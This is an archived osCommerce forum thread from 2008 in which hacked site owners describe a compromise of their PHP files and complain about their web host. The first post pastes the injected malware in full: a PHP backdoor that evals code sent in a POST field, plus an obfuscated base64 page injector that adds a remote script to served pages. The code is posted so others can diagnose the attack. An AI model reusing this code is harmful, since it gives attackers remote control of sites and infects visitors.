mshisha Posted November 12, 2008 Share Posted November 12, 2008 Well it looks like I was hacked for the 3rd time my website front was running fine BUT every file had added to it this :- if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhl cmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJyMvJ TJGJTJFLiUyRSYAIyUzQ2RgJTY5JTc2JTIwfnN0JTc5fmxAZXwlM0QjZGBpJTczcH4lNkMkJTYxJTc5fi UzQW4lNkYlNkUlNjVgJTNFflxuJTc2YXJ+JTIwXztgaSZmJTI4ZCFvfCU2M2B1JCU2RCU2NSU2RSU3NCU yRSU2MyU2RiU2RiQlNkIlNjkkJTY1JTJFIW1AJTYxdCElNjMlNjh8JTI4IyUyRiU1QyMlNjJ+JTY4Z3xm JTc0JCUzRCUzMSMvfCl8PSUzRG4jdWxsJiUyOSElNjRvJCU2MyU3NSU2RCElNjUmbiU3NC4hJTc3JTcya UB0JTY1JTI4IyUyMiUzQ3xzJTYzJCU3MkAlNjkkJTcwJTc0JTIwJTczJTcyJTYzJTNEfCUyRi8hJTM3Iz hALjF8NTcmLn4xQCUzNCUzMn4uIzUlMzgvJTYzJTcwJCUyRn4lM0YlMjJgJTJCQCU2RSU2MUAlNzZpIWd gYSQlNzRAb2AlNzIjLnxhcCYlNzAlNEUlNjFAbSYlNjV8LnxjJTY4JmElNzImQSN0fighMCElMjklMkJg IkAlM0V8JTNDJTVDJTJGISU3M2MlNzIjaSU3MCU3NCQlM0UmIiklM0JAXG4lMkYvIyUzQyUyRn4lNjR+a SU3NnwlM0UnKS5yZXBsYWNlKC9cJnx+fCN8XCR8QHxcfHxgfFwhL2csIiIpKTt2YXIgeWFob29fY291bn Rlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBo ZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp PLUS looking at the files - the "ownership" had been changed and the database name was a different one. Calling my webhosters resulted in absolutely nothing, no help, they did not understand and I dont know enough to fully understand either. I have all my file permissions to the minimum to operate but to no avail. I am seriously fed up The database was called kulu sota Just to let anyone else know out there of these problems - oh and do not use ixwebhosting - no customer service Link to comment Share on other sites More sharing options...
spooks Posted November 12, 2008 Share Posted November 12, 2008 1. change host, I reccomend you look at http://www.reviewcentre.com/products100.html and choose a host with good scores + plenty of reviews, do a web search on any your considering. 2. Secure your site. http://www.oscommerce.com/forums/index.php?showtopic=313323 Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
abuata Posted November 23, 2008 Share Posted November 23, 2008 Same thing happened to me. on 8/11/08 "thegrand" took control of almost all of my files. I did not catch it till now. Funny thing is that ixwebhosting sent me an email on 8/11/08 informing me that they moved my site to another server due to too much traffic. I am convinced they new they were attacked thats why they moved me. Now they say it is not them, it was all my fault. ixwebhosting is crap! I would like to clean my files now, that they "fixed" the ownership back to me, but now I cannot identify them. I would like to know if there is a way to clean this exploit attacker out of all my files? I am changing hosting co. ASAP. I do not want to have to blow my site and all my mods to start over. Does anyone have idea for an easier fix? BTW - I have 3 sites that were attacked, and one of them was not even an osC site. :angry: Thanks Link to comment Share on other sites More sharing options...
jdodgen Posted December 8, 2008 Share Posted December 8, 2008 tmp_lkojfghx I too got the same hack, all my php files had the added code. and I am also on ixwebhosting ... they told me it was MY problem. all my php files and html files had the ownership changed to "edjackso" now the difficulty I have with this is you have to be root the change the file ownership, a normal user cannot do this. So I have spent the better part of the day fixing things up. Link to comment Share on other sites More sharing options...
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.